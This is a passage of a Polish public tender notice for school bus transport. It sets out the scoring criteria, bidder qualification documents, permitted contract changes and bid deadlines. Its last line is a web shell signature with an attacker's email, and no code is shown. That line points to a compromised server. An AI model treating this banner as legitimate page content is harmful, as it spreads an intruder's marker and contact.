zajęć. Godziny rozpoczęcia i zakończenia zajęć dla dowożonych uczniów Zamawiający przekaże Wykonawcy do 30 sierpnia 2025 r. Godziny dowożenia mogą zostać zmienione z uwagi na potrzeby placówki, w szczególności wynikające z rozpoczęcia i zakończenia roku szkolnego lub innych dni. Wykonawca jest zobowiązany do stałej łączności z dyrektorami placówek, a w szczególności informowania dyrektora o awariach i spóźnieniach trwających powyżej 10 minut. Wykonawca zobowiązany jest do zapewnienia ciągłości wykonywania zamówienia w okresie i warunkach określonych w umowie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2027-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona oceny ofert złożonych w postępowaniu na podstawie następujących kryteriów oceny:<br/>Dla części 1 i 2<br/>1)	cena oferty brutto - 60%; oferta będzie oceniana wg następującego wzoru:<br/>C min<br/>Kc = ------------------- x 60<br/>C bad<br/>gdzie:<br/>K c – kryterium cenowe<br/>C min – cena najtańszej oferty <br/>C bad – cena badanej oferty <br/>Dla porównania ofert pod względem kryterium cenowego Zamawiający przyjmuje cenę ofertową brutto;<br/>2)	jakość – czas podstawienia pojazdu zastępczego w razie awarii pojazdu (od wystąpienia awarii) waga 40% maksymalnie 40 punktów do zdobycia. <br/>J - liczba punktów przyznanych Wykonawcy w kryterium jakość:<br/>a)	czas podstawienia pojazdu zastępczego do 30 min. od wystąpienia awarii – 40 pkt,<br/>b)	czas podstawienia pojazdu zastępczego od 31 min. do 60 min. od wystąpienia awarii – 20 pkt,<br/>c)	czas podstawienia pojazdu zastępczego od 61 min. do 90 min. od wystąpienia awarii – 0 pkt<br/>Ocenie zostanie poddany aspekt jakościowy. Czas podstawienia pojazdu zastępczego nie może być dłuższy niż 90 min. W formularzu ofertowym należy podać czas podstawienia autobusu zastępczego w przedziałach powyżej, poprzez skreślenie niepotrzebnych przedziałów czasowych. W przypadku wstawienia większej ilości minut niż 90 – oferta zostanie odrzucona jako niezgodna z SIWZ. W przypadku nie wskazania przez Wykonawcę czasu w ofercie, Zamawiający przyjmie czas 30 min. Punkty w ramach tego kryterium zostaną przyznane na podstawie wypełnionego przez Wykonawcę oświadczenia w formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ. <br/>2.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą ilość punktów w skali 100 punktowej obliczonych wg następującego wzoru:<br/>X= Kc+J<br/>gdzie:<br/>X	-	ilość punktów badanej oferty;<br/>Kc	-	ilość punktów badanej oferty w kryterium cena ;<br/>J	-	ilość punktów badanej oferty w kryterium jakość<br/>3. Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert niepodlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) jakość – czas podstawienia pojazdu zastępczego w razie awarii pojazdu (od wystąpienia awarii) waga 40%</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielnie zamówienia w niniejszym postępowaniu zgodnie z art. 112 ust. 2 PZP mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu w następującym zakresie:<br/>1)	Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać<br/>2)	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna warunek za spełniony jeśli: <br/>a)	Wykonawca wykaże, że posiada aktualną licencję/zezwolenie zezwalającą na wykonanie krajowego transportu drogowego osób zgodnie z Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2024r. poz. 728) lub inne uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje.<br/>3)	Sytuacja ekonomiczna lub finansowa<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać.<br/>4)	Zdolność techniczna lub zawodowa<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. W celu potwierdzenia<br/>braku podstaw do wykluczenia wykonawcy z<br/>udziału w postępowaniu, Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie zgodnie z art. 274 ust. 1 ustawy PZP, aktualnych na dzień<br/>złożenia:<br/>1) Odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem.<br/>2) Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy PZP, w zakresie podstaw do wykluczenia ust. 1 pkt 3-6 oraz art. 109 ust. 1 pkt 1<br/>ustawy PZP wg wzoru stanowiącego załącznik nr 4 do SWZ.<br/>3) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do<br/>tej samej grupy kapitałowej wg wzoru stanowiącego załącznik nr 5 do SWZ.<br/>4) Licencję aktualną licencję/zezwolenie zezwalającą na wykonanie krajowego transportu drogowego osób zgodnie z Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2024r. poz. 728)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do<br/>oferty sporządzonej w oparciu o Formularz oferty Wykonawca zobowiązany jest dołączyć w<br/>formie elektronicznej aktualne na dzień składania ofert, oświadczenie stanowiące wstępne<br/>potwierdzenie, że Wykonawca:<br/>1) nie podlega wykluczeniu,<br/>2) spełnia warunki udziału w postępowaniu<br/>Należy dołączyć oświadczenie wstępne zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, ze<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu<br/>Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie zgodnie z art. 274<br/>ust. 1 ustawy PZP, aktualnych na dzień złożenia: 1) uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej:<br/>a) aktualnej licencji/zezwolenia zezwalającą na wykonanie krajowego transportu drogowego osób zgodnie z Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2019r. poz. 2140 z późn. zm.)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć oświadczenie wstępne Wykonawcy wg wzoru stanowiącego załącznik<br/>nr 2 do SWZ, pełnomocnictwo, zobowiązanie podmiotu udostępniającego zasoby,<br/>2. Z postępowania o udzielenie zamówienia Zamawiający wykluczy także Wykonawcę/ów na podstawie art. 7 ust. 1 pkt 1-3<br/>ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022, poz. 835) – weryfikacja na podstawie oświadczenia stanowiącego załącznik 2 i 4 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Do oferty należy dołączyć oświadczenie wstępne Wykonawcy wg wzoru stanowiącego załącznik nr 2 do SWZ, pełnomocnictwo, zobowiązanie podmiotu udostępniającego zasoby. Zapisy ujęto w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony dopuszczają dokonywanie zmian treści umowy, w następujących<br/>okolicznościach:<br/>1) dopuszcza się wprowadzenie zmian za zgodą Stron umowy,<br/>2) zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę,<br/>2. Zmiany, o których mowa mogą dotyczyć:<br/>1) wystąpienia siły wyższej;<br/>2) wystąpienia wyjątkowych okoliczności, niezależnych od Stron niniejszej umowy, których nie<br/>mogły one przewidzieć w chwili zawierania umowy, wpływających na realizację umowy;<br/>3) zmiany przepisów prawnych mających wpływ na przebieg realizacji umowy, a w<br/>szczególności zmiany przepisów podatkowych, przepisów oświatowych lub przepisów<br/>dotyczących transportu/przewozu osób;<br/>4) zmiany przebiegu tras autobusów, miejsc przystanków, godzin przyjazdu i odjazdu ze<br/>szkoły/przedszkola w przypadku zmian w organizacji pracy jednostek oświatowych, zmian w<br/>planie lekcji, zmian w zakresie dowozu dzieci niepełnosprawnych lub dodanie jednostki<br/>przedszkolnej mającej siedzibę w miejscowości leżącej na trasie autobusu;<br/>5) wystąpienia utrudnień w ruchu z powodu robót drogowych, których nie można było<br/>przewidzieć w chwili zawarcia umowy;<br/>6) wystąpienia warunków atmosferycznych, które ze względów obiektywnych uniemożliwiają<br/>wykonanie usługi zgodnie ze specyfikacją istotnych warunków zamówienia lub umową;<br/>7) zmian, gdy są one korzystne dla Zamawiającego np. skrócenie trasy przejazdu dające taki<br/>sam efekt dowiezienia dzieci do szkół i odwiezienia ich ze szkół;<br/>8) poprawy jakości świadczonej usługi pod warunkiem zachowania dotychczasowego<br/>wynagrodzenia;<br/>9) przyczyn wynikających ze zmiany stosunków społeczno-gospodarczych lub gdy z innych<br/>powodów wystąpi konieczność zmiany terminu, zakresu, bądź innych zapisów, bez zmiany<br/>których realizacja umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę;<br/>10) zmiany podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował<br/>Zamawiający; jeżeli zmiana podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się w celu<br/>wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać Zamawiającemu, iż<br/>proponowany inny podwykonawca spełnia je w stopniu<br/>nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powołał się w trakcie<br/>postępowania o udzielenie zamówienia;<br/>11) wystąpienia innych okoliczności niepowstałych z winy Wykonawcy;<br/>12) ilości lub długości tras wynikających z zapotrzebowania Zamawiającego co powodować będzie konieczność stworzenia przez Wykonawcę nowego kursu w komunikacji regularnej, o<br/>której mowa w § 1 ust. 8 niniejszej umowy, co powodować będzie zmianę wynagrodzenia<br/>miesięcznego, o którym mowa w § 7 ust. 1 proporcjonalnie do zmienionej długości tras.<br/>3. W przypadku zmiany o których mowa w ust. 2 pkt 3 w zakresie mającym wpływ na realizację<br/>przedmiotu zamówienia - odpowiednie zapisy umowy zostaną dostosowane do obowiązującego<br/>stanu prawnego.<br/>4. Zmiany mogą być zainicjowane tylko poprzez złożenie pisemnego wniosku. Wniosek powinien<br/>zawierać:<br/>1) opis zmiany,<br/>2) uzasadnienie zmiany,<br/>3) ewentualny czas wykonania zmiany lub wpływ zmiany na termin zakończenia umowy;<br/>5. Dokonanie zmian wymaga podpisania aneksu do umowy.<br/>6. Nie stanowi zmiany umowy w rozumieniu art. 455 ustawy Prawo zamówień publicznych:<br/>1) zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr<br/>rachunku bankowego);<br/>2) zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany<br/>stanu faktycznego albo prawnego;<br/>Pozostały zakres zmian z uwagi na ograniczoną ilość miejsca w ogłoszeniu umieszczono w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza dostępnego na platformie komercyjnej https://stepnica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 2. Z postępowania o udzielenie zamówienia Zamawiający wykluczy także Wykonawcę/ów na podstawie art. 7 ust. 1 pkt 1-3<br/>ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022, poz. 835) – weryfikacja na podstawie oświadczenia stanowiącego załącznik 2 i 4 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com